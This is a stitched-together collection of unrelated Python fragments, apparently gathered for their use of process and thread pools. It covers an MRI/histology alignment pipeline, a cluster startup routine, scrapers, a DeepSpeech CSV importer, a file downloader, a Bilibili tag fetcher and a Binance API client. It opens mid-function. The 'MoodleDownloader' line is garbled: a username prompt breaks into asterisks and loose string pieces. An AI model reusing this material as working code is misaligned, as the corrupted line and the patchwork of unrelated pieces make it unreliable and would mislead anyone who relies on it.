    rgb_typed = rgb.view(rgb_dtype).reshape(shape_3d)
    mri = nib.load(self.MRI)
    volume = nib.Nifti1Image(rgb_typed, affine=mri.affine)
    nib.save(volume, final_out_dir + '/RGB_aligned_histology_vol.nii.gz')
def main(): # configure the program to use utf8 encoding reload(sys) sys.setdefaultencoding('utf8') print "#### Welcome to the MoodleDownloader!\n" sUsername = raw_input("Enter you username: "******"\n\n"
def start(self):
    """
    Starts the cluster with the properties given in the constructor.

    Nodes are started on a thread pool via ``self._start_node``; the cluster
    is saved through ``self._storage`` after the start and again once the
    nodes are alive. Nodes that do not come up, or cannot be connected to,
    within ``Cluster.startup_timeout`` seconds are stopped and removed.
    Finally the cluster size is validated with ``self._check_cluster_size``.

    Exits the process with status 1 when interrupted with Ctrl-C.
    """
    # To not mess up the cluster management we start the nodes in a
    # different thread. The main thread receives the SIGINT and signals the
    # wait loop below through `self.keep_running`.
    self.keep_running = True

    def sigint_handler(signum, frame):
        """
        Makes sure the cluster is stored, before the sigint results in
        exiting during the node startup.
        """
        log.error("user interruption: saving cluster before exit.")
        self.keep_running = False

    nodes = self.get_all_nodes()
    thread_pool = Pool(processes=len(nodes))
    log.debug("Created pool of %d threads" % len(nodes))

    signal.signal(signal.SIGINT, sigint_handler)

    result = thread_pool.map_async(self._start_node, nodes)

    # Poll once a second so a Ctrl-C is noticed promptly.
    while not result.ready():
        result.wait(1)
        if not self.keep_running:
            # The user aborted the start of the cluster. Finish the node
            # starts in progress and save the status to the storage, so
            # no unmanaged instances are left lying around.
            log.error("Aborting upon Ctrl-C")
            thread_pool.close()
            thread_pool.join()
            self._storage.dump_cluster(self)
            sys.exit(1)

    # All start tasks have completed: release the worker threads.
    thread_pool.close()
    thread_pool.join()

    # dump the cluster here, so we don't lose any knowledge
    self._storage.dump_cluster(self)

    signal.alarm(0)

    def sigint_reset(signum, frame):
        sys.exit(1)

    signal.signal(signal.SIGINT, sigint_reset)

    # check if all nodes are running, stop all nodes if the
    # timeout is reached
    def timeout_handler(signum, frame):
        # Interpolate the timeout into the message instead of passing the
        # format arguments as extra exception args.
        raise TimeoutError(
            "problems occured while starting the nodes, "
            "timeout `%i`" % Cluster.startup_timeout)

    signal.signal(signal.SIGALRM, timeout_handler)
    signal.alarm(Cluster.startup_timeout)

    starting_nodes = self.get_all_nodes()
    try:
        while starting_nodes:
            starting_nodes = [
                n for n in starting_nodes if not n.is_alive()
            ]
            if starting_nodes:
                time.sleep(10)
    except TimeoutError:
        log.error("Not all nodes were started correctly within the given"
                  " timeout `%s`" % Cluster.startup_timeout)
        # Iterate over a copy: remove_node() may alter the node lists.
        for node in list(starting_nodes):
            log.error("Stopping node `%s`, since it could not start "
                      "within the given timeout" % node.name)
            node.stop()
            self.remove_node(node)

    signal.alarm(0)

    # If we reached this point, we should have IP addresses for
    # the nodes, so update the storage file again.
    self._storage.dump_cluster(self)

    # Try to connect to each node. Run the setup action only when
    # we successfully connect to all of them.
    signal.signal(signal.SIGALRM, timeout_handler)
    signal.alarm(Cluster.startup_timeout)
    pending_nodes = self.get_all_nodes()[:]

    try:
        while pending_nodes:
            for node in pending_nodes[:]:
                if node.connect():
                    log.info("Connection to node %s (%s) successful.",
                             node.name, node.ip_public)
                    pending_nodes.remove(node)
            if pending_nodes:
                time.sleep(5)
    except TimeoutError:
        # remove the pending nodes from the cluster
        log.error("Could not connect to all the nodes of the "
                  "cluster within the given timeout `%s`."
                  % Cluster.startup_timeout)
        for node in pending_nodes:
            log.error("Stopping node `%s`, since we could not connect to"
                      " it within the timeout." % node.name)
            node.stop()
            self.remove_node(node)

    signal.alarm(0)

    # A lot of things could go wrong when starting the cluster. To
    # ensure a stable cluster fitting the needs of the user in terms of
    # cluster size, we check the minimum nodes within the node groups to
    # match the current setup.
    self._check_cluster_size()
def start_pipeline(self):
    """
    Defines the steps and order of the pipeline. Only call from
    Pipeline.run() to avoid errors.

    Steps: create the output directories, preprocess the inputs, optionally
    resample to the histology or blockface resolution, align, and (when
    ``self.color`` is true) colorize.
    """
    mark = '================================='
    print(mark, '\nSTEP 0: GENERATING OUTPUT DIRECTORIES\n', mark)
    self.gen_directory_struct()

    print(mark, 'STEP 1:PREPROCESSING', mark)
    self.orig_MRI = self.MRI
    self.preprocess_histology()
    self.preprocess_blockface()
    self.preprocess_MRI()

    print(mark, '\nSTEP 2:RESAMPLING (OPTIONAL)\n', mark)
    # Compare by value: ``is not`` on a string literal tests identity.
    if self.resolution_level != 'MRI':
        self.MRI_path += 'resampled_'
        resampled_mri = self.MRI_path + os.path.split(self.orig_MRI)[1]
        resampled_bf_dir = self.orig_bf_loc + "/NIFTI/resampled/"

        if self.resolution_level == 'histology':
            # Match the resolution of histology.
            if self.overwrite == False and os.path.isfile(resampled_mri):
                print(
                    ' - {} Already Exists. Utilizing currently existing data.'.
                    format(resampled_mri))
            else:
                self.resample(self.MRI, resampled_mri,
                              self.histology.pix_dim,
                              self.histology.affine_3D, 3)
            self.MRI = resampled_mri

            # Reuse resampled blockface slices only if all of them exist.
            reuse_blockface = False
            if self.overwrite == False:
                reuse_blockface = all(
                    os.path.isfile(resampled_bf_dir + bf_slice.name)
                    for bf_slice in self.BF_NIFTI.slices)

            if reuse_blockface:
                print(
                    ' - All Resampled Blockface NIFTI Files Exist. Utilizing currently existing data.'
                )
            else:
                for bf_slice in self.BF_NIFTI.slices:
                    self.resample(bf_slice.path,
                                  resampled_bf_dir + bf_slice.name,
                                  self.histology.pix_dim,
                                  self.histology.affine_3D, 2)
            self.BF_NIFTI.rename(resampled_bf_dir)
            self.BF_NIFTI.affine_3D = self.hist_NIFTI.affine_3D

        elif self.resolution_level == 'blockface':
            # Match the resolution of blockface.
            if self.overwrite == False and os.path.isfile(resampled_mri):
                print(
                    ' - {} Already Exists. Utilizing currently existing data.'.
                    format(resampled_mri))
            else:
                self.resample(self.MRI, resampled_mri, self.bf.pix_dim,
                              self.histology.affine_3D, 3)
            # Point at the resampled file whether it was just created or
            # already existed.
            self.MRI = resampled_mri

    print(mark, '\nSTEP 3:ALIGNMENT\n', mark)
    self.slice_by_slice_alignment(self.threads,
                                  self.orig_slice_by_slice_loc)
    self.blockface_to_MRI_alignment(self.orig_bf_loc +
                                    "/volume/aligned_to_MRI")

    self.orig_hist_NIFTI.col = 'gray'
    pool = Pool(processes=self.threads)
    try:
        pool.map(
            Transform_Wrapper(self.orig_hist_NIFTI, self.hist_transform,
                              self.BF_NIFTI, self.orig_slice_by_slice_loc),
            list(range(len(self.hist_transform.slices))))
    finally:
        # Release the workers even when a transformation fails.
        pool.close()
        pool.join()

    hist_vol = Stacks.NIFTI_Stack(self.orig_slice_by_slice_loc + '/gray',
                                  '*.nii.gz', self.hist_NIFTI.affine_3D)
    hist_vol.volumize(self.final_out + '/hist_to_bf.nii.gz')
    self.final_apply_transform(self.final_out + '/hist_to_bf.nii.gz',
                               self.final_out + '/hist_to_MRI.nii.gz')

    if self.color == True:
        print(mark, '\nSTEP 4:COLORIZATION\n', mark)
        self.colorize(self.orig_col_split_loc, self.final_out)
    print('Done!')
def parallelCrawling(url):
    """Apply ``download`` to every item of ``nextURL(url)`` on 12 workers."""
    workers = Pool(12)
    targets = nextURL(url)
    workers.map(download, targets)
    # Wait for outstanding work before returning.
    workers.close()
    workers.join()
def product_main():
    """Scrape every (link, page, category) combination and merge the results.

    Reads ``link``, ``cat``, ``large`` and ``small`` from an ``info`` module
    in the current working directory, runs ``helper`` over all combinations
    on a thread pool whose size is asked for interactively, then concatenates
    the Excel files found in today's ``*_product/`` directory, removes
    duplicate ``pid`` rows and writes a timestamped ``Products.xlsx``.
    """
    # Make ./info.py importable for the duration of the import only.
    cwd = os.getcwd()
    sys.path.append(cwd)
    try:
        from info import link, cat, large, small
    except ImportError:
        print('lack of info.py')
        sys.exit(0)
    print('imported data from info')
    sys.path.remove(cwd)

    cpu = int(raw_input('(multi-processing) how many process to run ? '))

    # "small" pages are fetched without a category (0); "large" pages are
    # combined with every category.
    swim = [(link, i, 0) for i in small]
    swim.extend((link, p, c) for p in large for c in cat)
    print("combinations: " + str(len(swim)))

    start = time()
    pool = ThreadPool(cpu)
    try:
        pool.map(helper, swim)
    finally:
        pool.close()
        pool.join()
    elapse = time() - start
    print('used {:.2f} s, {:.2f} mins'.format(elapse, elapse / 60))

    print('start concating data')
    # Directory name is built from the ctime() fields: day + month + year.
    ct = ctime().split()
    path = ct[2] + ct[1] + ct[-1] + '_product/'
    files = os.listdir(path)
    df = pd.concat([pd.read_excel(path + i) for i in files])
    print(df.shape)

    print('removing duplicates')
    # Move 'pid' and 'title' to the front, then keep the first row per pid.
    col = list(df.columns)
    col = [col.pop(col.index('pid')), col.pop(col.index('title'))] + col
    df = df[col]
    df = df.reset_index(drop=True)
    df = df.loc[df['pid'].drop_duplicates().index, :]
    print(df.shape)

    print('saving to products.xlsx')
    df.to_excel(strftime("%Y-%m-%d-%H-%M", localtime()) + ' Products.xlsx',
                encoding='utf-8', index=False)
    print('done! ' + ctime())
def _maybe_convert_set(input_tsv, audio_dir, label_filter,
                       space_after_every_character=None):
    """Convert one TSV sample list into a DeepSpeech-formatted CSV.

    Every row's audio file is converted to WAV through ``_maybe_convert_wav``
    and its transcript is passed through ``label_filter``. Samples that fail
    conversion, have an invalid label, or are too short or too long are
    counted and skipped; the rest are written to the CSV.

    :param input_tsv: path of the TSV file with ``path`` and ``sentence``
        columns.
    :param audio_dir: directory holding the audio files; also receives the CSV.
    :param label_filter: callable mapping a transcript to a validated label,
        or ``None`` to reject the sample.
    :param space_after_every_character: when true, the transcript is written
        with a space between every character.
    """
    output_csv = path.join(audio_dir,
                           os.path.split(input_tsv)[-1].replace('tsv', 'csv'))
    print("Saving new DeepSpeech-formatted CSV file to: ", output_csv)

    # Get audiofile path and transcript for each sentence in tsv
    with open(input_tsv, encoding='utf-8') as input_tsv_file:
        reader = csv.DictReader(input_tsv_file, delimiter='\t')
        samples = [(row['path'], row['sentence']) for row in reader]

    # Keep track of how many samples are good vs. problematic
    counter = {
        'all': 0,
        'failed': 0,
        'invalid_label': 0,
        'too_short': 0,
        'too_long': 0,
        'total_time': 0
    }
    lock = RLock()
    num_samples = len(samples)
    rows = []

    def one_sample(sample):
        """ Take a audio file, and optionally convert it to 16kHz WAV """
        mp3_filename = path.join(audio_dir, sample[0])
        if not path.splitext(mp3_filename.lower())[1] == '.mp3':
            mp3_filename += ".mp3"
        # Storing wav files next to the mp3 ones - just with a different suffix
        wav_filename = path.splitext(mp3_filename)[0] + ".wav"
        _maybe_convert_wav(mp3_filename, wav_filename)

        file_size = -1
        frames = 0
        if path.exists(wav_filename):
            file_size = path.getsize(wav_filename)
            frames = int(
                subprocess.check_output(['soxi', '-s', wav_filename],
                                        stderr=subprocess.STDOUT))
        label = label_filter(sample[1])

        # The counters and the row list are shared between workers.
        with lock:
            if file_size == -1:
                # Excluding samples that failed upon conversion
                counter['failed'] += 1
            elif label is None:
                # Excluding samples that failed on label validation
                counter['invalid_label'] += 1
            elif int(frames / SAMPLE_RATE * 1000 / 10 / 2) < len(str(label)):
                # Excluding samples that are too short to fit the transcript
                counter['too_short'] += 1
            elif frames / SAMPLE_RATE > MAX_SECS:
                # Excluding very long samples to keep a reasonable batch-size
                counter['too_long'] += 1
            else:
                # This one is good - keep it for the target CSV
                rows.append(
                    (os.path.split(wav_filename)[-1], file_size, label))
            counter['all'] += 1
            counter['total_time'] += frames

    print("Importing mp3 files...")
    pool = Pool(cpu_count())
    try:
        bar = progressbar.ProgressBar(max_value=num_samples,
                                      widgets=SIMPLE_BAR)
        for i, _ in enumerate(pool.imap_unordered(one_sample, samples),
                              start=1):
            bar.update(i)
        bar.update(num_samples)
    finally:
        # Release the workers even when a conversion raises.
        pool.close()
        pool.join()

    with open(output_csv, 'w', encoding='utf-8') as output_csv_file:
        print('Writing CSV file for DeepSpeech.py as: ', output_csv)
        writer = csv.DictWriter(output_csv_file, fieldnames=FIELDNAMES)
        writer.writeheader()
        bar = progressbar.ProgressBar(max_value=len(rows), widgets=SIMPLE_BAR)
        for filename, file_size, transcript in bar(rows):
            if space_after_every_character:
                transcript = ' '.join(transcript)
            writer.writerow({
                'wav_filename': filename,
                'wav_filesize': file_size,
                'transcript': transcript
            })

    # Report the rows actually kept; deriving the number from the counters
    # missed the 'invalid_label' rejections and over-reported.
    print('Imported %d samples.' % len(rows))
    if counter['failed'] > 0:
        print('Skipped %d samples that failed upon conversion.' %
              counter['failed'])
    if counter['invalid_label'] > 0:
        print('Skipped %d samples that failed on transcript validation.' %
              counter['invalid_label'])
    if counter['too_short'] > 0:
        print(
            'Skipped %d samples that were too short to match the transcript.'
            % counter['too_short'])
    if counter['too_long'] > 0:
        print('Skipped %d samples that were longer than %d seconds.' %
              (counter['too_long'], MAX_SECS))
    print('Final amount of imported audio: %s.' %
          secs_to_hours(counter['total_time'] / SAMPLE_RATE))
def _thread(hs, cs, n):
    """Map callable ``hs`` over iterable ``cs`` on a pool of ``n`` workers.

    Returns the list of results in input order.
    """
    workers = Pool(n)
    outcome = workers.map(hs, cs)
    # Shut the pool down before handing the results back.
    workers.close()
    workers.join()
    return outcome
def downloadFiles(self, directory = None, maxRetries = 5, multiproc = False, numproc = 3, overwrite = False):
    """Download every URL in ``self.fileURLs``.

    Each file is stored in a sub-directory of the base directory named after
    characters 1-4 of the second dot-separated field of the file name
    (presumably the acquisition year - verify against the URL scheme).
    URLs that still fail after ``maxRetries`` attempts are appended to
    ``download_failed.txt`` in the current working directory.

    Parameters
    ----------
    directory: str
        Base directory where to save files. Falls back to ``self.targetDir``
        when omitted.
    maxRetries: int
        Maximum number of retrys to open the url
    multiproc: boolean
        Download multiple files at the same time.
    numproc: int optional
        Number of pool workers if multiproc is set to True
    overwrite: boolean
        Should existing files be overwritten? When False (default) files that
        already exist are skipped.

    Return
    ------
    None. ``self.pathList`` is set to the list of ``(url, directory)`` tuples.
    """
    # Honour an explicit argument; only fall back to the instance default.
    if directory is None:
        directory = self.targetDir
    if directory is None:
        print("No target directory were to store files given. "
              "Instantiate search obejct with directory or set the "
              "directory parameter of downloadFiles.")
        return

    def pathTuple(url, directory = directory):
        """Pair a URL with the sub-directory it has to be stored in."""
        secfield = os.path.basename(url).split(".")[1]
        year = secfield[1:5]
        outdir = os.path.join(directory, year)
        return (url, outdir)

    def download(itemtuple):
        """Fetch one ``(url, directory)`` item, retrying on URL errors."""
        url, outdir = itemtuple
        fpath = os.path.join(outdir, os.path.basename(url))
        if overwrite or not os.path.isfile(fpath):
            for attempt in range(maxRetries):
                try:
                    response = urllib2.urlopen(url)
                    try:
                        # Read everything first so that a failed transfer
                        # does not leave a truncated file behind.
                        data = response.read()
                    finally:
                        response.close()
                except urllib2.URLError as e:
                    logger.debug(e)
                    logger.debug("File {0} failed to download with the above error".format(url))
                    if attempt == maxRetries - 1:
                        # Append, so earlier failures are not wiped out.
                        with open("download_failed.txt", "a") as f:
                            f.write(url + "\n")
                else:
                    with open(fpath, "wb") as f:
                        f.write(data)
                    break
        #update progressbar
        pbar.update(1)

    self.pathList = [pathTuple(url) for url in self.fileURLs]

    #create year directories separate to avoid race condition when
    #using it in the download function itself and multiprocessing enabled
    for d in set(x[1] for x in self.pathList):
        if not os.path.exists(d):
            os.makedirs(d)

    msg = "Starting download of files..."
    logger.info(msg)

    pbar = tqdm(total = len(self.pathList))
    try:
        if multiproc:
            p = Pool(numproc)
            try:
                p.map(download, self.pathList)
            finally:
                p.close()
                p.join()
        else:
            # Explicit loop: a bare map() is lazy on Python 3 and would
            # never call download().
            for item in self.pathList:
                download(item)
    finally:
        pbar.close()
def get_all(codes, f):
    """Call ``f`` once for every element of ``codes`` on a 40-thread pool.

    The return values of ``f`` are discarded; the function blocks until every
    call has finished.

    :param codes: iterable of arguments, one per call.
    :param f: callable taking a single element of ``codes``.
    """
    # Function-call form works on both Python 2 and Python 3.
    print(type(codes))
    pool = ThreadPool(40)
    try:
        pool.map(f, codes)
    finally:
        # Release the worker threads even when f raises.
        pool.close()
        pool.join()
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''Walk through the video submissions and store the tags of each one.'''
from multiprocessing.dummy import Pool as ThreadPool

from bilisupport import AVTAGLIST, ERRORLIST, API_TAG
import requests


def gettag(aid):
    '''Fetch the tags of one submission and store them.

    A successful response (``code == 0``) is turned into one
    ``{'aid': ..., 'tag': ...}`` document per tag and inserted into
    ``AVTAGLIST``; any other response is inserted into ``ERRORLIST``.

    :param aid: submission id, as an int or a numeric string.
    :return: ``404`` when ``aid`` is empty, otherwise ``None``.
    '''
    if not aid:
        return 404
    aid = int(aid)
    aidparams = {'aid': aid, 'jsonp': 'jsonp'}
    info = requests.get(url=API_TAG, params=aidparams).json()
    if info.get('code') == 0:
        # 'data' may be missing or empty for a submission without tags.
        tags = [{'aid': aid, 'tag': x.get('tag_id')}
                for x in info.get('data') or []]
        if tags:
            # presumably a pymongo collection, whose insert_many rejects an
            # empty list - verify against bilisupport
            AVTAGLIST.insert_many(tags)
        print(aid)
    else:
        ERRORLIST.insert_one(info)


if __name__ == '__main__':
    MULTIPOOL = ThreadPool(8)
    try:
        with open('videoaid.csv', 'r') as aid_file:
            for avid in aid_file:
                avid = avid.strip()
                # Blank lines would make int() fail inside the worker, where
                # apply_async swallows the exception without a trace.
                if avid:
                    MULTIPOOL.apply_async(gettag, (avid, ))
    finally:
        MULTIPOOL.close()
        MULTIPOOL.join()
class BinanceApi(object):
    """Binance REST and websocket client built around a worker pool.

    REST calls are queued with ``addReq`` and executed by the workers created
    in ``start``; the outcome is handed to the ``on...`` callback given when
    the request was queued (or to ``onError``).  The callbacks defined here
    only print what they receive.
    """

    ###################################################
    ## Basic Function
    ###################################################

    def __init__(self):
        """Constructor"""
        self.apiKey = ''
        self.secretKey = ''

        self.active = False
        self.reqid = 0
        self.queue = Queue()
        self.pool = None

        self.headers = {}
        self.secret = ''
        self.recvWindow = 5000

        self.dataStreamNameList = []
        self.dataStreamUrl = ''
        self.dataStreamActive = False
        self.dataStreamWs = None
        self.dataStreamThread = None

        self.userStreamKey = ''
        self.userStreamUrl = ''
        self.userStreamActive = False
        self.userStreamWs = None
        self.userStreamThread = None

        self.keepaliveCount = 0
        self.keepaliveThread = None

    def init(self, apiKey, secretKey, recvWindow=5000):
        """Store the credentials and the recvWindow used for signed requests."""
        self.apiKey = apiKey
        self.secretKey = secretKey

        self.headers['X-MBX-APIKEY'] = apiKey
        self.secret = bytes(secretKey.encode('utf-8'))
        self.recvWindow = recvWindow

    def start(self, n=10):
        """Start ``n`` workers that consume the request queue (no-op if running)."""
        if self.active:
            return

        self.active = True
        self.pool = Pool(n)
        self.pool.map_async(self.run, range(n))

    def close(self):
        """Tell the workers to stop and wait for the pool to shut down."""
        self.active = False

        if self.pool:
            self.pool.close()
            self.pool.join()

    def request(self, method, path, params=None, signed=False, stream=False):
        """Perform one HTTP request against the REST endpoint.

        :param method: HTTP verb.
        :param path: path appended to ``REST_ENDPOINT``.
        :param params: optional dict of query parameters; never modified.
        :param signed: send the API key header; unless ``stream`` is set, also
            add ``recvWindow``/``timestamp`` and an HMAC-SHA256 signature.
        :param stream: user-data-stream call: API key header, no signature.
        :return: ``(True, decoded_json)`` for HTTP 200, otherwise
            ``(False, error_dict)`` with ``method``, ``params``, ``code`` and
            ``msg`` keys.
        """
        if not signed:
            url = REST_ENDPOINT + path
            headers = {}
        else:
            if not stream:
                # Sign a copy: the caller's dict must not pick up
                # recvWindow/timestamp, and params may legitimately be None.
                params = dict(params) if params else {}
                params['recvWindow'] = self.recvWindow
                params['timestamp'] = int(time() * 1000)
                query = parse.urlencode(sorted(params.items()))

                signature = hmac.new(self.secret, query.encode('utf-8'),
                                     hashlib.sha256).hexdigest()
                query += "&signature={}".format(signature)

                url = REST_ENDPOINT + path + '?' + query
                # Everything now lives in the query string; clear params so
                # requests does not append them a second time.
                params = None
            else:
                if params:
                    query = parse.urlencode(sorted(params.items()))
                    url = REST_ENDPOINT + path + '?' + query
                    params = None
                else:
                    url = REST_ENDPOINT + path

            headers = self.headers

        try:
            resp = requests.request(method, url, params=params, headers=headers)

            if resp.status_code == 200:
                return True, resp.json()
            else:
                error = {
                    'method': method,
                    'params': params,
                    'code': resp.status_code,
                    'msg': resp.json()['msg']
                }
                return False, error
        except Exception as e:
            error = {
                'method': method,
                'params': params,
                'code': e,
                'msg': traceback.format_exc()
            }
            return False, error

    def addReq(self, method, path, params, callback, signed=False, stream=False):
        """Queue a request for the workers and return its request id."""
        self.reqid += 1
        req = (method, path, params, callback, signed, stream, self.reqid)
        self.queue.put(req)
        return self.reqid

    def processReq(self, req):
        """Execute one queued request and dispatch the result."""
        method, path, params, callback, signed, stream, reqid = req
        result, data = self.request(method, path, params, signed, stream)

        if result:
            callback(data, reqid)
        else:
            self.onError(data, reqid)

    def run(self, n):
        """Worker loop: process queued requests until ``active`` is cleared."""
        while self.active:
            try:
                # The timeout lets the loop re-check self.active every second.
                req = self.queue.get(timeout=1)
                self.processReq(req)
            except Empty:
                pass

    ###################################################
    ## REST Function
    ###################################################

    def queryPing(self):
        """Queue GET /api/v1/ping."""
        path = '/api/v1/ping'
        return self.addReq('GET', path, {}, self.onQueryPing)

    def queryTime(self):
        """Queue GET /api/v1/time."""
        path = '/api/v1/time'
        return self.addReq('GET', path, {}, self.onQueryTime)

    def queryExchangeInfo(self):
        """Queue GET /api/v1/exchangeInfo."""
        path = '/api/v1/exchangeInfo'
        return self.addReq('GET', path, {}, self.onQueryExchangeInfo)

    def queryDepth(self, symbol, limit=0):
        """Queue GET /api/v1/depth; falsy optional arguments are omitted."""
        path = '/api/v1/depth'
        params = {'symbol': symbol}
        if limit:
            params['limit'] = limit
        return self.addReq('GET', path, params, self.onQueryDepth)

    def queryTrades(self, symbol, limit=0):
        """Queue GET /api/v1/trades; falsy optional arguments are omitted."""
        path = '/api/v1/trades'
        params = {'symbol': symbol}
        if limit:
            params['limit'] = limit
        return self.addReq('GET', path, params, self.onQueryTrades)

    def queryAggTrades(self, symbol, fromId=0, startTime=0, endTime=0, limit=0):
        """Queue GET /api/v1/aggTrades; falsy optional arguments are omitted."""
        path = '/api/v1/aggTrades'

        params = {'symbol': symbol}
        if fromId:
            params['fromId'] = fromId
        if startTime:
            params['startTime'] = startTime
        if endTime:
            params['endTime'] = endTime
        if limit:
            params['limit'] = limit

        return self.addReq('GET', path, params, self.onQueryAggTrades)

    def queryKlines(self, symbol, interval, limit=0, startTime=0, endTime=0):
        """Queue GET /api/v1/klines; falsy optional arguments are omitted."""
        path = '/api/v1/klines'

        params = {'symbol': symbol, 'interval': interval}
        if limit:
            params['limit'] = limit
        if startTime:
            params['startTime'] = startTime
        if endTime:
            params['endTime'] = endTime

        return self.addReq('GET', path, params, self.onQueryKlines)

    def queryTicker24HR(self, symbol=''):
        """Queue GET /api/v1/ticker/24hr, optionally for a single symbol."""
        path = '/api/v1/ticker/24hr'
        params = {}
        if symbol:
            params['symbol'] = symbol
        return self.addReq('GET', path, params, self.onQueryTicker24HR)

    def queryTickerPrice(self, symbol=''):
        """Queue GET /api/v3/ticker/price, optionally for a single symbol."""
        path = '/api/v3/ticker/price'
        params = {}
        if symbol:
            params['symbol'] = symbol
        return self.addReq('GET', path, params, self.onQueryTickerPrice)

    def queryBookTicker(self, symbol=''):
        """Queue GET /api/v3/ticker/bookTicker, optionally for a single symbol."""
        path = '/api/v3/ticker/bookTicker'
        params = {}
        if symbol:
            params['symbol'] = symbol
        return self.addReq('GET', path, params, self.onQueryBookTicker)

    def newOrder(self, symbol, side, type_, price, quantity, timeInForce,
                 newClientOrderId='', stopPrice=0, icebergQty=0, newOrderRespType=''):
        """Queue a signed POST /api/v3/order; falsy optional arguments are omitted."""
        path = '/api/v3/order'

        params = {
            'symbol': symbol,
            'side': side,
            'type': type_,
            'price': price,
            'quantity': quantity,
            'timeInForce': timeInForce
        }
        if newClientOrderId:
            params['newClientOrderId'] = newClientOrderId
        if stopPrice:
            params['stopPrice'] = stopPrice
        if icebergQty:
            params['icebergQty'] = icebergQty
        if newOrderRespType:
            params['newOrderRespType'] = newOrderRespType

        return self.addReq('POST', path, params, self.onNewOrder, signed=True)

    def queryOrder(self, symbol, orderId=0, origClientOrderId=0):
        """Queue a signed GET /api/v3/order; falsy optional arguments are omitted."""
        path = '/api/v3/order'
        params = {'symbol': symbol}
        if orderId:
            params['orderId'] = orderId
        if origClientOrderId:
            params['origClientOrderId'] = origClientOrderId
        return self.addReq('GET', path, params, self.onQueryOrder, signed=True)

    def cancelOrder(self, symbol, orderId=0, origClientOrderId='', newClientOrderId=''):
        """Queue a signed DELETE /api/v3/order; falsy optional arguments are omitted."""
        path = '/api/v3/order'
        params = {'symbol': symbol}
        if orderId:
            params['orderId'] = orderId
        if origClientOrderId:
            params['origClientOrderId'] = origClientOrderId
        if newClientOrderId:
            params['newClientOrderId'] = newClientOrderId
        return self.addReq('DELETE', path, params, self.onCancelOrder, signed=True)

    def queryOpenOrders(self, symbol=''):
        """Queue a signed GET /api/v3/openOrders, optionally for a single symbol."""
        path = '/api/v3/openOrders'
        params = {}
        if symbol:
            params['symbol'] = symbol
        return self.addReq('GET', path, params, self.onQueryOpenOrders, signed=True)

    def queryAllOrders(self, symbol, orderId=0, limit=0):
        """Queue a signed GET /api/v3/allOrders; falsy optional arguments are omitted."""
        path = '/api/v3/allOrders'
        params = {'symbol': symbol}
        if orderId:
            params['orderId'] = orderId
        if limit:
            params['limit'] = limit
        return self.addReq('GET', path, params, self.onQueryAllOrders, signed=True)

    def queryAccount(self):
        """Queue a signed GET /api/v3/account."""
        path = '/api/v3/account'
        params = {}
        return self.addReq('GET', path, params, self.onQueryAccount, signed=True)

    def queryMyTrades(self, symbol, limit=0, fromId=0):
        """Queue a signed GET /api/v3/myTrades; falsy optional arguments are omitted."""
        path = '/api/v3/myTrades'
        params = {'symbol': symbol}
        if limit:
            params['limit'] = limit
        if fromId:
            params['fromId'] = fromId
        return self.addReq('GET', path, params, self.onQueryMyTrades, signed=True)

    def startStream(self):
        """Queue POST /api/v1/userDataStream (API key header, no signature)."""
        path = '/api/v1/userDataStream'
        return self.addReq('POST', path, {}, self.onStartStream, signed=True, stream=True)

    def keepaliveStream(self, listenKey):
        """Queue PUT /api/v1/userDataStream for ``listenKey``."""
        path = '/api/v1/userDataStream'
        params = {'listenKey': listenKey}
        return self.addReq('PUT', path, params, self.onKeepaliveStream, signed=True, stream=True)

    def closeStream(self, listenKey):
        """Queue DELETE /api/v1/userDataStream for ``listenKey``."""
        path = '/api/v1/userDataStream'
        params = {'listenKey': listenKey}
        return self.addReq('DELETE', path, params, self.onCloseStream, signed=True, stream=True)

    ###################################################
    ## REST Callback
    ###################################################
    # Every callback receives the decoded response (or the error dict for
    # onError) and the request id returned by addReq.

    def onError(self, data, reqid):
        """Called with the error dict of a failed request."""
        print((data, reqid))

    def onQueryPing(self, data, reqid):
        """Called with the result of queryPing."""
        print((data, reqid))

    def onQueryTime(self, data, reqid):
        """Called with the result of queryTime."""
        print((data, reqid))

    def onQueryExchangeInfo(self, data, reqid):
        """Called with the result of queryExchangeInfo."""
        print((data, reqid))

    def onQueryDepth(self, data, reqid):
        """Called with the result of queryDepth."""
        print((data, reqid))

    def onQueryTrades(self, data, reqid):
        """Called with the result of queryTrades."""
        print((data, reqid))

    def onQueryAggTrades(self, data, reqid):
        """Called with the result of queryAggTrades."""
        print((data, reqid))

    def onQueryKlines(self, data, reqid):
        """Called with the result of queryKlines."""
        print((data, reqid))

    def onQueryTicker24HR(self, data, reqid):
        """Called with the result of queryTicker24HR."""
        print((data, reqid))

    def onQueryTickerPrice(self, data, reqid):
        """Called with the result of queryTickerPrice."""
        print((data, reqid))

    def onQueryBookTicker(self, data, reqid):
        """Called with the result of queryBookTicker."""
        print((data, reqid))

    def onNewOrder(self, data, reqid):
        """Called with the result of newOrder."""
        print((data, reqid))

    def onQueryOrder(self, data, reqid):
        """Called with the result of queryOrder."""
        print((data, reqid))

    def onCancelOrder(self, data, reqid):
        """Called with the result of cancelOrder."""
        print((data, reqid))

    def onQueryOpenOrders(self, data, reqid):
        """Called with the result of queryOpenOrders."""
        print((data, reqid))

    def onQueryAllOrders(self, data, reqid):
        """Called with the result of queryAllOrders."""
        print((data, reqid))

    def onQueryAccount(self, data, reqid):
        """Called with the result of queryAccount."""
        print((data, reqid))

    def onQueryMyTrades(self, data, reqid):
        """Called with the result of queryMyTrades."""
        print((data, reqid))

    def onStartStream(self, data, reqid):
        """Called with the result of startStream."""
        print((data, reqid))

    def onKeepaliveStream(self, data, reqid):
        """Called with the result of keepaliveStream."""
        print((data, reqid))

    def onCloseStream(self, data, reqid):
        """Called with the result of closeStream."""
        print((data, reqid))

    ###################################################
    ## Websocket Function
    ###################################################

    def initDataStream(self, nameList=None):
        """Connect the market-data websocket and start its reader thread.

        :param nameList: optional list of stream names; when given it replaces
            ``dataStreamNameList``.  The names are joined with ``/`` and
            appended to ``DATASTREAM_ENDPOINT``.
        """
        if nameList:
            self.dataStreamNameList = nameList
        s = '/'.join(self.dataStreamNameList)
        self.dataStreamUrl = DATASTREAM_ENDPOINT + s

        result = self.connectDataStream()
        if result:
            self.dataStreamActive = True
            self.dataStreamThread = Thread(target=self.runDataStream)
            self.dataStreamThread.start()

    def runDataStream(self):
        """Reader loop: decode each message as JSON, reconnect on any error."""
        while self.dataStreamActive:
            try:
                stream = self.dataStreamWs.recv()
                data = json.loads(stream)
                self.onMarketData(data)
            except Exception:
                self.onDataStreamError('Data stream connection lost')
                result = self.connectDataStream()
                if not result:
                    self.onDataStreamError(u'Waiting 3 seconds to reconnect')
                    sleep(3)
                else:
                    self.onDataStreamError(u'Data stream reconnected')

